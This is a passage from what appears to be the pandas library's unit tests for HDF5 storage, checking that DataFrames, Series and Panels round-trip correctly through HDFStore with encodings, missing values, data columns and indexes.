_maybe_remove(store, 'df')
store.put('df', df, format=format)
assert_frame_equal(df, store['df'])
for index in [tm.makeFloatIndex, tm.makeStringIndex,
tm.makeIntIndex, tm.makeDateIndex]:
check('table', index)
check('fixed', index)
# period index currently broken for table
# seee GH7796 FIXME
check('fixed', tm.makePeriodIndex)
# check('table',tm.makePeriodIndex)
# unicode
index = tm.makeUnicodeIndex
if compat.PY3:
check('table', index)
check('fixed', index)
else:
# only support for fixed types (and they have a perf warning)
pytest.raises(TypeError, check, 'table', index)
# PerformanceWarning
with catch_warnings(record=True):
check('fixed', index)
@pytest.mark.skipif(not is_platform_little_endian(),
reason="reason platform is not little endian")
def test_encoding(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(A='foo', B='bar'), index=range(5))
df.loc[2, 'A'] = np.nan
df.loc[3, 'B'] = np.nan
_maybe_remove(store, 'df')
store.append('df', df, encoding='ascii')
tm.assert_frame_equal(store['df'], df)
expected = df.reindex(columns=['A'])
result = store.select('df', Term('columns=A', encoding='ascii'))
tm.assert_frame_equal(result, expected)
def test_latin_encoding(self):
if compat.PY2:
tm.assert_raises_regex(
TypeError, r'\[unicode\] is not implemented as a table column')
return
values = [[b'E\xc9, 17', b'', b'a', b'b', b'c'],
[b'E\xc9, 17', b'a', b'b', b'c'],
[b'EE, 17', b'', b'a', b'b', b'c'],
[b'E\xc9, 17', b'\xf8\xfc', b'a', b'b', b'c'],
[b'', b'a', b'b', b'c'],
[b'\xf8\xfc', b'a', b'b', b'c'],
[b'A\xf8\xfc', b'', b'a', b'b', b'c'],
[np.nan, b'', b'b', b'c'],
[b'A\xf8\xfc', np.nan, b'', b'b', b'c']]
def _try_decode(x, encoding='latin-1'):
try:
return x.decode(encoding)
except AttributeError:
return x
# not sure how to remove latin-1 from code in python 2 and 3
values = [[_try_decode(x) for x in y] for y in values]
examples = []
for dtype in ['category', object]:
for val in values:
examples.append(pd.Series(val, dtype=dtype))
def roundtrip(s, key='data', encoding='latin-1', nan_rep=''):
with ensure_clean_path(self.path) as store:
s.to_hdf(store, key, format='table', encoding=encoding,
nan_rep=nan_rep)
retr = read_hdf(store, key)
s_nan = s.replace(nan_rep, np.nan)
if is_categorical_dtype(s_nan):
assert is_categorical_dtype(retr)
assert_series_equal(s_nan, retr, check_dtype=False,
check_categorical=False)
else:
assert_series_equal(s_nan, retr)
for s in examples:
roundtrip(s)
# fails:
# for x in examples:
# roundtrip(s, nan_rep=b'\xf8\xfc')
def test_append_some_nans(self):
with ensure_clean_store(self.path) as store:
df = DataFrame({'A': Series(np.random.randn(20)).astype('int32'),
'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar',
'D': Timestamp("20010101"),
'E': datetime.datetime(2001, 1, 2, 0, 0)},
index=np.arange(20))
# some nans
_maybe_remove(store, 'df1')
df.loc[0:15, ['A1', 'B', 'D', 'E']] = np.nan
store.append('df1', df[:10])
store.append('df1', df[10:])
tm.assert_frame_equal(store['df1'], df)
# first column
df1 = df.copy()
df1.loc[:, 'A1'] = np.nan
_maybe_remove(store, 'df1')
store.append('df1', df1[:10])
store.append('df1', df1[10:])
tm.assert_frame_equal(store['df1'], df1)
# 2nd column
df2 = df.copy()
df2.loc[:, 'A2'] = np.nan
_maybe_remove(store, 'df2')
store.append('df2', df2[:10])
store.append('df2', df2[10:])
tm.assert_frame_equal(store['df2'], df2)
# datetimes
df3 = df.copy()
df3.loc[:, 'E'] = np.nan
_maybe_remove(store, 'df3')
store.append('df3', df3[:10])
store.append('df3', df3[10:])
tm.assert_frame_equal(store['df3'], df3)
def test_append_all_nans(self):
with ensure_clean_store(self.path) as store:
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20)},
index=np.arange(20))
df.loc[0:15, :] = np.nan
# nan some entire rows (dropna=True)
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df[-4:])
# nan some entire rows (dropna=False)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# tests the option io.hdf.dropna_table
pd.set_option('io.hdf.dropna_table', False)
_maybe_remove(store, 'df3')
store.append('df3', df[:10])
store.append('df3', df[10:])
tm.assert_frame_equal(store['df3'], df)
pd.set_option('io.hdf.dropna_table', True)
_maybe_remove(store, 'df4')
store.append('df4', df[:10])
store.append('df4', df[10:])
tm.assert_frame_equal(store['df4'], df[-4:])
# nan some entire rows (string are still written!)
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar'},
index=np.arange(20))
df.loc[0:15, :] = np.nan
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# nan some entire rows (but since we have dates they are still
# written!)
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar',
'D': Timestamp("20010101"),
'E': datetime.datetime(2001, 1, 2, 0, 0)},
index=np.arange(20))
df.loc[0:15, :] = np.nan
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# Test to make sure defaults are to not drop.
# Corresponding to Issue 9382
df_with_missing = DataFrame(
{'col1': [0, np.nan, 2], 'col2': [1, np.nan, np.nan]})
with ensure_clean_path(self.path) as path:
df_with_missing.to_hdf(path, 'df_with_missing', format='table')
reloaded = read_hdf(path, 'df_with_missing')
tm.assert_frame_equal(df_with_missing, reloaded)
matrix = [[[np.nan, np.nan, np.nan], [1, np.nan, np.nan]],
[[np.nan, np.nan, np.nan], [np.nan, 5, 6]],
[[np.nan, np.nan, np.nan], [np.nan, 3, np.nan]]]
with catch_warnings(record=True):
panel_with_missing = Panel(matrix,
items=['Item1', 'Item2', 'Item3'],
major_axis=[1, 2],
minor_axis=['A', 'B', 'C'])
with ensure_clean_path(self.path) as path:
panel_with_missing.to_hdf(
path, 'panel_with_missing', format='table')
reloaded_panel = read_hdf(path, 'panel_with_missing')
tm.assert_panel_equal(panel_with_missing, reloaded_panel)
def test_append_frame_column_oriented(self):
with ensure_clean_store(self.path) as store:
# column oriented
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df.iloc[:, :2], axes=['columns'])
store.append('df1', df.iloc[:, 2:])
tm.assert_frame_equal(store['df1'], df)
result = store.select('df1', 'columns=A')
expected = df.reindex(columns=['A'])
tm.assert_frame_equal(expected, result)
# selection on the non-indexable
result = store.select(
'df1', ('columns=A', 'index=df.index[0:4]'))
expected = df.reindex(columns=['A'], index=df.index[0:4])
tm.assert_frame_equal(expected, result)
# this isn't supported
with pytest.raises(TypeError):
store.select('df1',
'columns=A and index>df.index[4]')
def test_append_with_different_block_ordering(self):
# GH 4096; using same frames, but different block orderings
with ensure_clean_store(self.path) as store:
for i in range(10):
df = DataFrame(np.random.randn(10, 2), columns=list('AB'))
df['index'] = range(10)
df['index'] += i * 10
df['int64'] = Series([1] * len(df), dtype='int64')
df['int16'] = Series([1] * len(df), dtype='int16')
if i % 2 == 0:
del df['int64']
df['int64'] = Series([1] * len(df), dtype='int64')
if i % 3 == 0:
a = df.pop('A')
df['A'] = a
df.set_index('index', inplace=True)
store.append('df', df)
# test a different ordering but with more fields (like invalid
# combinate)
with ensure_clean_store(self.path) as store:
df = DataFrame(np.random.randn(10, 2),
columns=list('AB'), dtype='float64')
df['int64'] = Series([1] * len(df), dtype='int64')
df['int16'] = Series([1] * len(df), dtype='int16')
store.append('df', df)
# store additional fields in different blocks
df['int16_2'] = Series([1] * len(df), dtype='int16')
pytest.raises(ValueError, store.append, 'df', df)
# store multile additional fields in different blocks
df['float_3'] = Series([1.] * len(df), dtype='float64')
pytest.raises(ValueError, store.append, 'df', df)
def test_ndim_indexables(self):
# test using ndim tables in new ways
with catch_warnings(record=True):
with ensure_clean_store(self.path) as store:
p4d = tm.makePanel4D()
def check_indexers(key, indexers):
for i, idx in enumerate(indexers):
descr = getattr(store.root, key).table.description
assert getattr(descr, idx)._v_pos == i
# append then change (will take existing schema)
indexers = ['items', 'major_axis', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store.select('p4d'), p4d)
check_indexers('p4d', indexers)
# same as above, but try to append with different axes
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :], axes=[
'labels', 'items', 'major_axis'])
assert_panel4d_equal(store.select('p4d'), p4d)
check_indexers('p4d', indexers)
# pass incorrect number of axes
_maybe_remove(store, 'p4d')
pytest.raises(ValueError, store.append, 'p4d', p4d.iloc[
:, :, :10, :], axes=['major_axis', 'minor_axis'])
# different than default indexables #1
indexers = ['labels', 'major_axis', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
check_indexers('p4d', indexers)
# different than default indexables #2
indexers = ['major_axis', 'labels', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
check_indexers('p4d', indexers)
# partial selection
result = store.select('p4d', ['labels=l1'])
expected = p4d.reindex(labels=['l1'])
assert_panel4d_equal(result, expected)
# partial selection2
result = store.select(
'p4d', "labels='l1' and items='ItemA' and minor_axis='B'")
expected = p4d.reindex(
labels=['l1'], items=['ItemA'], minor_axis=['B'])
assert_panel4d_equal(result, expected)
# non-existent partial selection
result = store.select(
'p4d', "labels='l1' and items='Item1' and minor_axis='B'")
expected = p4d.reindex(labels=['l1'], items=[],
minor_axis=['B'])
assert_panel4d_equal(result, expected)
def test_append_with_strings(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
wp2 = wp.rename_axis(
{x: "%s_extra" % x for x in wp.minor_axis}, axis=2)
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize == size
store.append('s1', wp, min_itemsize=20)
store.append('s1', wp2)
expected = concat([wp, wp2], axis=2)
expected = expected.reindex(
minor_axis=sorted(expected.minor_axis))
assert_panel_equal(store['s1'], expected)
check_col('s1', 'minor_axis', 20)
# test dict format
store.append('s2', wp, min_itemsize={'minor_axis': 20})
store.append('s2', wp2)
expected = concat([wp, wp2], axis=2)
expected = expected.reindex(
minor_axis=sorted(expected.minor_axis))
assert_panel_equal(store['s2'], expected)
check_col('s2', 'minor_axis', 20)
# apply the wrong field (similar to #1)
store.append('s3', wp, min_itemsize={'major_axis': 20})
pytest.raises(ValueError, store.append, 's3', wp2)
# test truncation of bigger strings
store.append('s4', wp)
pytest.raises(ValueError, store.append, 's4', wp2)
# avoid truncation on elements
df = DataFrame([[123, 'asdqwerty'], [345, 'dggnhebbsdfbdfb']])
store.append('df_big', df)
tm.assert_frame_equal(store.select('df_big'), df)
check_col('df_big', 'values_block_1', 15)
# appending smaller string ok
df2 = DataFrame([[124, 'asdqy'], [346, 'dggnhefbdfb']])
store.append('df_big', df2)
expected = concat([df, df2])
tm.assert_frame_equal(store.select('df_big'), expected)
check_col('df_big', 'values_block_1', 15)
# avoid truncation on elements
df = DataFrame([[123, 'asdqwerty'], [345, 'dggnhebbsdfbdfb']])
store.append('df_big2', df, min_itemsize={'values': 50})
tm.assert_frame_equal(store.select('df_big2'), df)
check_col('df_big2', 'values_block_1', 50)
# bigger string on next append
store.append('df_new', df)
df_new = DataFrame(
[[124, 'abcdefqhij'], [346, 'abcdefghijklmnopqrtsuvwxyz']])
pytest.raises(ValueError, store.append, 'df_new', df_new)
# min_itemsize on Series index (GH 11412)
df = tm.makeMixedDataFrame().set_index('C')
store.append('ss', df['B'], min_itemsize={'index': 4})
tm.assert_series_equal(store.select('ss'), df['B'])
# same as above, with data_columns=True
store.append('ss2', df['B'], data_columns=True,
min_itemsize={'index': 4})
tm.assert_series_equal(store.select('ss2'), df['B'])
# min_itemsize in index without appending (GH 10381)
store.put('ss3', df, format='table',
min_itemsize={'index': 6})
# just make sure there is a longer string:
df2 = df.copy().reset_index().assign(C='longer').set_index('C')
store.append('ss3', df2)
tm.assert_frame_equal(store.select('ss3'),
pd.concat([df, df2]))
# same as above, with a Series
store.put('ss4', df['B'], format='table',
min_itemsize={'index': 6})
store.append('ss4', df2['B'])
tm.assert_series_equal(store.select('ss4'),
pd.concat([df['B'], df2['B']]))
# with nans
_maybe_remove(store, 'df')
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[1:4, 'string'] = np.nan
df['string2'] = 'bar'
df.loc[4:8, 'string2'] = np.nan
df['string3'] = 'bah'
df.loc[1:, 'string3'] = np.nan
store.append('df', df)
result = store.select('df')
tm.assert_frame_equal(result, df)
with ensure_clean_store(self.path) as store:
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize, size
df = DataFrame(dict(A='foo', B='bar'), index=range(10))
# a min_itemsize that creates a data_column
_maybe_remove(store, 'df')
store.append('df', df, min_itemsize={'A': 200})
check_col('df', 'A', 200)
assert store.get_storer('df').data_columns == ['A']
# a min_itemsize that creates a data_column2
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['B'], min_itemsize={'A': 200})
check_col('df', 'A', 200)
assert store.get_storer('df').data_columns == ['B', 'A']
# a min_itemsize that creates a data_column2
_maybe_remove(store, 'df')
store.append('df', df, data_columns=[
'B'], min_itemsize={'values': 200})
check_col('df', 'B', 200)
check_col('df', 'values_block_0', 200)
assert store.get_storer('df').data_columns == ['B']
# infer the .typ on subsequent appends
_maybe_remove(store, 'df')
store.append('df', df[:5], min_itemsize=200)
store.append('df', df[5:], min_itemsize=200)
tm.assert_frame_equal(store['df'], df)
# invalid min_itemsize keys
df = DataFrame(['foo', 'foo', 'foo', 'barh',
'barh', 'barh'], columns=['A'])
_maybe_remove(store, 'df')
pytest.raises(ValueError, store.append, 'df',
df, min_itemsize={'foo': 20, 'foobar': 20})
def test_to_hdf_with_min_itemsize(self):
with ensure_clean_path(self.path) as path:
# min_itemsize in index with to_hdf (GH 10381)
df = tm.makeMixedDataFrame().set_index('C')
df.to_hdf(path, 'ss3', format='table', min_itemsize={'index': 6})
# just make sure there is a longer string:
df2 = df.copy().reset_index().assign(C='longer').set_index('C')
df2.to_hdf(path, 'ss3', append=True, format='table')
tm.assert_frame_equal(pd.read_hdf(path, 'ss3'),
pd.concat([df, df2]))
# same as above, with a Series
df['B'].to_hdf(path, 'ss4', format='table',
min_itemsize={'index': 6})
df2['B'].to_hdf(path, 'ss4', append=True, format='table')
tm.assert_series_equal(pd.read_hdf(path, 'ss4'),
pd.concat([df['B'], df2['B']]))
def test_append_with_data_columns(self):
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
df.iloc[0, df.columns.get_loc('B')] = 1.
_maybe_remove(store, 'df')
store.append('df', df[:2], data_columns=['B'])
store.append('df', df[2:])
tm.assert_frame_equal(store['df'], df)
# check that we have indicies created
assert(store._handle.root.df.table.cols.index.is_indexed is True)
assert(store._handle.root.df.table.cols.B.is_indexed is True)
# data column searching
result = store.select('df', 'B>0')
expected = df[df.B > 0]
tm.assert_frame_equal(result, expected)
# data column searching (with an indexable and a data_columns)
result = store.select(
'df', 'B>0 and index>df.index[3]')
df_new = df.reindex(index=df.index[4:])
expected = df_new[df_new.B > 0]
tm.assert_frame_equal(result, expected)
# data column selection with a string data_column
df_new = df.copy()
df_new['string'] = 'foo'
df_new.loc[1:4, 'string'] = np.nan
df_new.loc[5:6, 'string'] = 'bar'
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'])
result = store.select('df', "string='foo'")
expected = df_new[df_new.string == 'foo']
tm.assert_frame_equal(result, expected)
# using min_itemsize and a data column
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize == size
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'],
min_itemsize={'string': 30})
check_col('df', 'string', 30)
_maybe_remove(store, 'df')
store.append(
'df', df_new, data_columns=['string'], min_itemsize=30)
check_col('df', 'string', 30)
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'],
min_itemsize={'values': 30})
check_col('df', 'string', 30)
with ensure_clean_store(self.path) as store:
df_new['string2'] = 'foobarbah'
df_new['string_block1'] = 'foobarbah1'
df_new['string_block2'] = 'foobarbah2'
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string', 'string2'],
min_itemsize={'string': 30, 'string2': 40,
'values': 50})
check_col('df', 'string', 30)
check_col('df', 'string2', 40)
check_col('df', 'values_block_1', 50)
with ensure_clean_store(self.path) as store:
# multiple data columns
df_new = df.copy()
df_new.iloc[0, df_new.columns.get_loc('A')] = 1.
df_new.iloc[0, df_new.columns.get_loc('B')] = -1.
df_new['string'] = 'foo'
sl = df_new.columns.get_loc('string')
df_new.iloc[1:4, sl] = np.nan
df_new.iloc[5:6, sl] = 'bar'
df_new['string2'] = 'foo'
sl = df_new.columns.get_loc('string2')
df_new.iloc[2:5, sl] = np.nan
df_new.iloc[7:8, sl] = 'bar'
_maybe_remove(store, 'df')
store.append(
'df', df_new, data_columns=['A', 'B', 'string', 'string2'])
result = store.select('df',
"string='foo' and string2='foo'"
" and A>0 and B<0")
expected = df_new[(df_new.string == 'foo') & (
df_new.string2 == 'foo') & (df_new.A > 0) & (df_new.B < 0)]
tm.assert_frame_equal(result, expected, check_index_type=False)
# yield an empty frame
result = store.select('df', "string='foo' and string2='cool'")
expected = df_new[(df_new.string == 'foo') & (
df_new.string2 == 'cool')]
tm.assert_frame_equal(result, expected, check_index_type=False)
with ensure_clean_store(self.path) as store:
# doc example
df_dc = df.copy()
df_dc['string'] = 'foo'
df_dc.loc[4:6, 'string'] = np.nan
df_dc.loc[7:9, 'string'] = 'bar'
df_dc['string2'] = 'cool'
df_dc['datetime'] = Timestamp('20010102')
df_dc = df_dc._convert(datetime=True)
df_dc.loc[3:5, ['A', 'B', 'datetime']] = np.nan
_maybe_remove(store, 'df_dc')
store.append('df_dc', df_dc,
data_columns=['B', 'C', 'string',
'string2', 'datetime'])
result = store.select('df_dc', 'B>0')
expected = df_dc[df_dc.B > 0]
tm.assert_frame_equal(result, expected, check_index_type=False)
result = store.select(
'df_dc', ['B > 0', 'C > 0', 'string == foo'])
expected = df_dc[(df_dc.B > 0) & (df_dc.C > 0) & (
df_dc.string == 'foo')]
tm.assert_frame_equal(result, expected, check_index_type=False)
with ensure_clean_store(self.path) as store:
# doc example part 2
np.random.seed(1234)
index = date_range('1/1/2000', periods=8)
df_dc = DataFrame(np.random.randn(8, 3), index=index,
columns=['A', 'B', 'C'])
df_dc['string'] = 'foo'
df_dc.loc[4:6, 'string'] = np.nan
df_dc.loc[7:9, 'string'] = 'bar'
df_dc.loc[:, ['B', 'C']] = df_dc.loc[:, ['B', 'C']].abs()
df_dc['string2'] = 'cool'
# on-disk operations
store.append('df_dc', df_dc, data_columns=[
'B', 'C', 'string', 'string2'])
result = store.select('df_dc', 'B>0')
expected = df_dc[df_dc.B > 0]
tm.assert_frame_equal(result, expected)
result = store.select(
'df_dc', ['B > 0', 'C > 0', 'string == "foo"'])
expected = df_dc[(df_dc.B > 0) & (df_dc.C > 0) &
(df_dc.string == 'foo')]
tm.assert_frame_equal(result, expected)
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# panel
# GH5717 not handling data_columns
np.random.seed(1234)
p = tm.makePanel()
store.append('p1', p)
tm.assert_panel_equal(store.select('p1'), p)
store.append('p2', p, data_columns=True)
tm.assert_panel_equal(store.select('p2'), p)
result = store.select('p2', where='ItemA>0')
expected = p.to_frame()
expected = expected[expected['ItemA'] > 0]
tm.assert_frame_equal(result.to_frame(), expected)
result = store.select(
'p2', where='ItemA>0 & minor_axis=["A","B"]')
expected = p.to_frame()
expected = expected[expected['ItemA'] > 0]
expected = expected[expected.reset_index(
level=['major']).index.isin(['A', 'B'])]
tm.assert_frame_equal(result.to_frame(), expected)
def test_create_table_index(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
def col(t, column):
return getattr(store.get_storer(t).table.cols, column)
# index=False
wp = tm.makePanel()
store.append('p5', wp, index=False)
store.create_table_index('p5', columns=['major_axis'])
assert(col('p5', 'major_axis').is_indexed is True)
assert(col('p5', 'minor_axis').is_indexed is False)
# index=True
store.append('p5i', wp, index=True)
assert(col('p5i', 'major_axis').is_indexed is True)
assert(col('p5i', 'minor_axis').is_indexed is True)
# default optlevels
store.get_storer('p5').create_index()
assert(col('p5', 'major_axis').index.optlevel == 6)
assert(col('p5', 'minor_axis').index.kind == 'medium')
# let's change the indexing scheme
store.create_table_index('p5')
assert(col('p5', 'major_axis').index.optlevel == 6)
assert(col('p5', 'minor_axis').index.kind == 'medium')
store.create_table_index('p5', optlevel=9)
assert(col('p5', 'major_axis').index.optlevel == 9)
assert(col('p5', 'minor_axis').index.kind == 'medium')
store.create_table_index('p5', kind='full')
assert(col('p5', 'major_axis').index.optlevel == 9)
assert(col('p5', 'minor_axis').index.kind == 'full')
store.create_table_index('p5', optlevel=1, kind='light')
assert(col('p5', 'major_axis').index.optlevel == 1)
assert(col('p5', 'minor_axis').index.kind == 'light')
# data columns
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df['string2'] = 'bar'
store.append('f', df, data_columns=['string', 'string2'])
assert(col('f', 'index').is_indexed is True)
assert(col('f', 'string').is_indexed is True)
assert(col('f', 'string2').is_indexed is True)
# specify index=columns
store.append(
'f2', df, index=['string'],
data_columns=['string', 'string2'])
assert(col('f2', 'index').is_indexed is False)
assert(col('f2', 'string').is_indexed is True)
assert(col('f2', 'string2').is_indexed is False)
# try to index a non-table
_maybe_remove(store, 'f2')
store.put('f2', df)
pytest.raises(TypeError, store.create_table_index, 'f2')
def test_append_diff_item_order(self):
with catch_warnings(record=True):
wp = tm.makePanel()
wp1 = wp.iloc[:, :10, :]
wp2 = wp.iloc[wp.items.get_indexer(['ItemC', 'ItemB', 'ItemA']),
10:, :]
with ensure_clean_store(self.path) as store:
store.put('panel', wp1, format='table')
pytest.raises(ValueError, store.put, 'panel', wp2,
append=True)
def test_append_hierarchical(self):
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo', 'bar'])
df = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
with ensure_clean_store(self.path) as store:
store.append('mi', df)
result = store.select('mi')
tm.assert_frame_equal(result, df)
# GH 3748
result = store.select('mi', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
with ensure_clean_path('test.hdf') as path:
df.to_hdf(path, 'df', format='table')
result = read_hdf(path, 'df', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_column_multiindex(self):
# GH 4710
# recreate multi-indexes properly
index = MultiIndex.from_tuples([('A', 'a'), ('A', 'b'),
('B', 'a'), ('B', 'b')],
names=['first', 'second'])
df = DataFrame(np.arange(12).reshape(3, 4), columns=index)
expected = df.copy()
if isinstance(expected.index, RangeIndex):
expected.index = Int64Index(expected.index)
with ensure_clean_store(self.path) as store:
store.put('df', df)
tm.assert_frame_equal(store['df'], expected,
check_index_type=True,
check_column_type=True)
store.put('df1', df, format='table')
tm.assert_frame_equal(store['df1'], expected,
check_index_type=True,
check_column_type=True)
pytest.raises(ValueError, store.put, 'df2', df,
format='table', data_columns=['A'])
pytest.raises(ValueError, store.put, 'df3', df,
format='table', data_columns=True)
# appending multi-column on existing table (see GH 6167)
with ensure_clean_store(self.path) as store:
store.append('df2', df)
store.append('df2', df)
tm.assert_frame_equal(store['df2'], concat((df, df)))
# non_index_axes name
df = DataFrame(np.arange(12).reshape(3, 4),
columns=Index(list('ABCD'), name='foo'))
expected = df.copy()
if isinstance(expected.index, RangeIndex):
expected.index = Int64Index(expected.index)
with ensure_clean_store(self.path) as store:
store.put('df1', df, format='table')
tm.assert_frame_equal(store['df1'], expected,
check_index_type=True,
check_column_type=True)
def test_store_multiindex(self):
# validate multi-index names
# GH 5527
with ensure_clean_store(self.path) as store:
def make_index(names=None):
return MultiIndex.from_tuples([(datetime.datetime(2013, 12, d),
s, t)
for d in range(1, 3)
for s in range(2)
for t in range(3)],
names=names)
# no names
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index())
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
# partial names
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', None, None]))
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
# series
_maybe_remove(store, 's')
s = Series(np.zeros(12), index=make_index(['date', None, None]))
store.append('s', s)
xp = Series(np.zeros(12), index=make_index(
['date', 'level_1', 'level_2']))
tm.assert_series_equal(store.select('s'), xp)
# dup with column
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', 'a', 't']))
pytest.raises(ValueError, store.append, 'df', df)
# fully names
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', 's', 't']))
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
def test_select_columns_in_where(self):
# GH 6169
# recreate multi-indexes when columns is passed
# in the `where` argument
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo_name', 'bar_name'])
# With a DataFrame
df = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table')
expected = df[['A']]
tm.assert_frame_equal(store.select('df', columns=['A']), expected)
tm.assert_frame_equal(store.select(
'df', where="columns=['A']"), expected)
# With a Series
s = Series(np.random.randn(10), index=index,
name='A')
with ensure_clean_store(self.path) as store:
store.put('s', s, format='table')
tm.assert_series_equal(store.select('s', where="columns=['A']"), s)
def test_mi_data_columns(self):
# GH 14435
idx = pd.MultiIndex.from_arrays([date_range('2000-01-01', periods=5),
range(5)], names=['date', 'id'])
df = pd.DataFrame({'a': [1.1, 1.2, 1.3, 1.4, 1.5]}, index=idx)
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=True)
actual = store.select('df', where='id == 1')
expected = df.iloc[[1], :]
tm.assert_frame_equal(actual, expected)
def test_pass_spec_to_storer(self):
df = tm.makeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('df', df)
pytest.raises(TypeError, store.select, 'df', columns=['A'])
pytest.raises(TypeError, store.select,
'df', where=[('columns=A')])
def test_append_misc(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# unsupported data types for non-tables
p4d = tm.makePanel4D()
pytest.raises(TypeError, store.put, 'p4d', p4d)
# unsupported data types
pytest.raises(TypeError, store.put, 'abc', None)
pytest.raises(TypeError, store.put, 'abc', '123')
pytest.raises(TypeError, store.put, 'abc', 123)
pytest.raises(TypeError, store.put, 'abc', np.arange(5))
df = tm.makeDataFrame()
store.append('df', df, chunksize=1)
result = store.select('df')
tm.assert_frame_equal(result, df)
store.append('df1', df, expectedrows=10)
result = store.select('df1')
tm.assert_frame_equal(result, df)
# more chunksize in append tests
def check(obj, comparator):
for c in [10, 200, 1000]:
with ensure_clean_store(self.path, mode='w') as store:
store.append('obj', obj, chunksize=c)
result = store.select('obj')
comparator(result, obj)
df = tm.makeDataFrame()
df['string'] = 'foo'
df['float322'] = 1.
df['float322'] = df['float322'].astype('float32')
df['bool'] = df['float322'] > 0
df['time1'] = Timestamp('20130101')
df['time2'] = Timestamp('20130102')
check(df, tm.assert_frame_equal)
with catch_warnings(record=True):
p = tm.makePanel()
check(p, assert_panel_equal)
with catch_warnings(record=True):
p4d = tm.makePanel4D()
check(p4d, assert_panel4d_equal)
# empty frame, GH4273
with ensure_clean_store(self.path) as store:
# 0 len
df_empty = DataFrame(columns=list('ABC'))
store.append('df', df_empty)
pytest.raises(KeyError, store.select, 'df')
# repeated append of 0/non-zero frames
df = DataFrame(np.random.rand(10, 3), columns=list('ABC'))
store.append('df', df)
assert_frame_equal(store.select('df'), df)
store.append('df', df_empty)
assert_frame_equal(store.select('df'), df)
# store
df = DataFrame(columns=list('ABC'))
store.put('df2', df)
assert_frame_equal(store.select('df2'), df)
with catch_warnings(record=True):
# 0 len
p_empty = Panel(items=list('ABC'))
store.append('p', p_empty)
pytest.raises(KeyError, store.select, 'p')
# repeated append of 0/non-zero frames
p = Panel(np.random.randn(3, 4, 5), items=list('ABC'))
store.append('p', p)
assert_panel_equal(store.select('p'), p)
store.append('p', p_empty)
assert_panel_equal(store.select('p'), p)
# store
store.put('p2', p_empty)
